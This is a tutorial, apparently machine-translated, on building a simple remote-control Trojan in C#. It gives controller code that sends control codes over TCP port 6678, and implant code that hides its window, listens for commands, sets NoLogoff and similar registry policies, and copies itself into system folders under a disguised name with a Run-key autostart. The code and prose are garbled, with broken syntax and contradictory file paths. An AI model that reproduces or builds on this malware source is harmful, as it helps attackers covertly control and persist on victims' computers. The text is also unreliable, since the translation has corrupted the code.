Trojan introduction
Because this article is to explore Trojans, there is a basic knowledge of some Trojan composed prior art before introducing. A complete Troist system consists of a hardware portion, a software portion, and a specific connection part. Here mainly introduces the software part, it mainly has a controller program, Trojan (background service), and Trojan formulation. The control end is used to remotely control the server's program; the Trojan is the program that sneaked into the server. The Trojan formulation is the port number, trigger condition, Trojan name, etc., which set the Trojan. More hidden programs.
Use technology:
The control terminal program sends a control code control server, the server background operation, and the purpose of modify the registration expression. Technology is not very difficult, mainly reflects the modification of the network programming and registry of C #.
Control terminal development:
The control terminal issues a control code to the server, after receiving the control code, complete the designated requirements based on the control requirements, if the server completes the job, return successful information.
Development of the control end:
The setting of the control code You can set itself, do not need to be detailed, there are several difficulties.
1, connection request
Use the system.net.sockets.tcpclient class in the .NET class.
TcpClient (String Hostname, INT Port)
Hostname is the host name to be controlled, of course, you can also use the IP address.
Port is a port.
// System.EventArgs contains base classes for event data classes
Private void button7_click (Object Sender, System.Eventargs E)
{
// Record operation, add operation information in the RichTextBox control
RichtextBox1.AppendText ("request connection" textbox1.text ");
INT port = 6678;
Try
{
// Initialize the new instance of the TCPCLIENT class and connect to the specified port on the specified host
Client = New TcpClient (TextBox1.text, port);
}
Catch
{
Messagebox.show ("server is not online! Determine if you enter the host name.");
RichtextBox1.AppendText ("Server is not online! Determine if you enter the host name.");
}
} // Private Void Buttion
2, whether the test is connected to the controlled machine. The process of the program is to send the control code to see if the control terminal has a reaction. If there is a return, the control is successful. / / Provide data streams from network access
// Private networkStream Stream;
code show as below:
Private void button8_click (Object Sender, System.EventArgs E)
{
// Record operation
RichtextBox1.AppendText ("Test" "");
Try
{
stream = client.getStream ();
IF (stream.canwrite)
{
// Send a control code
String Control = "jiance";
Byte [] by = system.text.Encoding.ascii.getbytes (control.tocharRay ())
Street.write (by, 0, by.length);
// Next time
stream.flush ();
// Start the thread that receives the reversal data
// Receive is a function of thread execution, see later analysis
ThreadReceive = New Thread (receive); threadreceive.start ();
}
}
Catch (Exception EE)
{
RichtextBox1.AppendText (Ee.Message ");
Messagebox.show (Ee.Message);
}
}
3, the code for controlling the effectiveness
Private void button9_click (Object Sender, System.Eventargs E)
{
/ / Here is the control code to be sent, Radiobutton is the form control
IF (radiobutton1.checked) {control = form2.zhucex;}
Else if (Radiobutton2.checked) {Control = form3.zhuces;
Else if (radiobutton3.checked) {control = Warring;
Else if (radiobutton4.checked) {control = suggest;}
Else if (radiobutton5.checked) {control = form4.mumawe;}
Else if (Radiobutton6.Checked) {Control = Drop;}
IF (Control == "000000)
{
Messagebox.show ("You don't enter any control target! Do not send control signals");
RichtextBox1.AppendText ("You don't enter any control target! Do not send control signal");
}
Else IF (Control! = "000000")
{
Try
{
// Record operation
RichtextBox1.AppendText (Control "is trying to control, waited for response ..." "");
stream = client.getStream ();
IF (stream.canwrite)
{
Byte [] by = system.text.Encoding.ascii.getbytes (CONTROL.TOCHARRAY ());
Street.write (by, 0, by.length);
stream.flush ();
ThreadReceive = New Thread (New ThreadStart (Receive));
ThreadRecEive.start ();
} // Endif
} // Try
Catch
{
RichtextBox1.AppendText ("Server is not connected 1 control is invalid!" "");
Messagebox.show ("server unconnected 1 control is invalid!" "");
}
} // Else IF
}
4, thread execution function
Private void receive ()
{
/ / Set the space to read the data
Byte [] bb = new byte [3];
// Read 3 bytes, i is the number of bytes that actually read
INT i = stream.read (bb, 0, 3);
// Convert to string, if it is a Chinese control code, use string ss = //system.text.Encoding.Unicode.getstring (BB);
String ss = system.text.Encoding.ascii.getstring (bb);
// hjc The return code HJC of the server I set is successful, HKZ is successful
IF (ss == "hjc") {
Messagebox.show ("Connection Success");
RichtextBox1.AppendText ("Connection Success");
}
IF (ss == "hkz")
{
RichtextBox1.AppendText (Control "control success" "");
Messagebox.show (Control "control success" "");
}
}
Service development:
To achieve the procedure of Trojan service, it is mainly to achieve the following functions: the operation of the background (hidden technology), the reception of the control code and the modification of the registry, the following introduction to these three aspects:
1. In the VC #, establish a background service program is easy, first create a new C # Windows application, the project name is self-defined (but to hide the name and the name of the system), the form properties " The showintaskbar "property is set to false, let it run in the taskbar when running, and set the property" WindowsTate "property to MININIZED, so that the form can be hidden. Of course, you can also set up in InitializationComponent (), this function is initialized, running before the form is displayed, the code is as follows:
Private vidinitiRizeComponent ()
{
//
// Form1
//
// Form display starting point and size
THIS.AUTOSCALEBASESIZE = New System.drawing.size (6, 14);
THIS.CLIENTSIZE = New System.drawing.size (368, 357);
// Form name
THIS.NAME = "Form1";
/ / Set the property to make it run in the background
THIS.SHOWINTASKBAR = FALSE;
THIS.TEXT = "Form1";
This.WindowsTate = system.windows.forms.formwindowstate.minimized;
}
2
Public Form1 () // Form constructor
{
//
// Windows Form Designer Support
//
InitializationComponent ();
//
// Todo: Add any constructor code after INITIALIZECOMPONENT call
// Add your listening code
// Port You can be set, I use a fixed port
INT port = 6678;
//System.net.sockets.tcplistener is used to listen to the client in the TCP network
Listener = New TCPListener (port);
// Start listening
Listener.start ();
/ / Add a thread that receives the control code. If you want to stop the thread, you can use thread.abort ()
// recontrolcode is a function of thread start execution, which is controlled according to the received control
// Control code Select the appropriate registry modification function
Thread thread = New Thread (New ThreadStart (Recontrolcode));
Thread.start ();
}
The recontrolcode function is as follows, the full code is seen
Private void recontrolcode () {
/ / Set the receiving socket, receive listener.acceptsocket is the request to return the customer already received
Socket = listener.acceptsocket ();
/ / If the connection is successful
While (socket.connected)
{
// Receive control code
Byte [] by = new byte [6];
INT i = socket.receive (by, by.length, 0);
String ss = system.text.Encoding.ascii.getstring (by);
/ / Perform different functions according to the control code
// Modify the registry to join the encoding
Switch (SS)
{
Case "jiance": // Test connection, return to test information
String str = "hjc";
Byte [] bytee = system.text.Encoding.ascii.getbytes (STR);
Socket.send (Bytee, 0, Bytee.Length, 0);
Break;
Case "ZX1000":
/ / Modify the registry function, self-defined, see the following analysis
Unlogoff ();
// Return to the control message
RetMessage ();
Break;
Case "ZX0100":
// Modify the registry function
Unclose ();
// Return to the control message
RetMessage ();
Break;
// Repeated Case function is the same as front, slightly
DEFAULT:
Break;
} // case
} // while
} // private void recontrolcode
3. Implement the registry in the C #, use the system.microsoft.win32 command space in the .NET class library, which provides two types of classes: Processing the class that caused by the operating system and the system registry the type. Below you can see its usage. Here I have made a subroutine that modifies the registry: make the computer can't log out. Before this, you can understand the registry, in the sub-key Software / Microsoft / Windows / CurrentVersion / Policies / Explorer
The key value nologoff is set to 1 to make the computer cannot be logged out. In the following functions, use C # to implement the modification of the registry:
PRIVATE VOID UNLOGOFF ()
{
/ / Get the top node of the registry of the host
Microsoft.win32.registryKey rlocal = registry.localmachine;
/ / Set a variable of a registry subkey
RegistryKey Key1;
Try
{
// Function RegistryKey.opensubKey (String RegistryKey, Bool CanWrite) Retrieves the specified subkey
// RegistryKey is the key value specified by the user, and canwrite can modify it for True. The default is that Fasle is not changed
Key1 =
Rlocal.opensubKey ("Software / Microsoft / Windows / CurrentVersion / Policies / Explorer", true);
/ / Set the key name, and value of the subkey
Key1.SetValue ("NOLOGOFF", 1);
// Close the open subkey
Key1.Close ();
// Warning string settings
MyStr = mystr "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Policies / Explorer key value NOLOGOFF is modified! Please set it to 0!";
}
Catch {}
// If there is no self-established IF (Key1 == Null)
{
Try
{
// Use the registryKey.createSubKey (String MyString) function to create the child you want
RegistryKey Key2 = rlocal.createSubkey ("Software / Microsoft / Windows / Currentversion / Policies / Explorer");
Key2.SetValue ("NOLOGOFF", 1);
Key2.Close ();
MyStr = mystr "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Policies / Explorer key value NOLOGOFF is modified! Please set it to 0!";
}
Catch {}
}
}
4. There is also an important function in the Trojan program to be self-replication and transfer. Trojans must automatically hide Trojans in SYSTEM, SYSTEM32, to prevent discovery. The transferred code analysis is as follows, the main implementation is to transfer the Trojans under the D to C: /WINNNT/SYSTEM /MSDOSS.EXE, and the name is changed. Used .NET namespace system.io, its role is to allow synchronous and asynchronous reading and writing of data streams and files. Here we use the System.IO.File class.
Private void movec1 ()
{
Try
{
// Function File.Move (String SourceFileName) The role of mobile files
// sourceFileName is the new path for the file name to move, DestfileName
File.move ("C: /Winnnt/system/msdoss.exe", "D: /Winnt/System32/ExPleror.exe");
}
Catch {}
// Set the newly moving Trojan to self-start. Analysis and front
Try
{
Key1 = rlocal.opensubKey ("Software / Microsoft / Windows / CurrentVersion / Run", TRUE);
Key1.SetValue ("MicrosoftT", "D: /Winnt/system32/ExPleror.exe");
Key1.Close ();
}
Catch {}
IF (Key1 == Null)
{
Try
{
RegistryKey Key2 = rlocal.createSubkey ("Software / Microsoft / Windows / CurrentVersion / Run");
Key1.SetValue ("MicrosoftT", "D: /Winnt/system32/ExPleror.exe");
Key1.Close ();
}
Catch {}
}
} // movec1 ()
Here, a simple C # of a simple C # is completed.
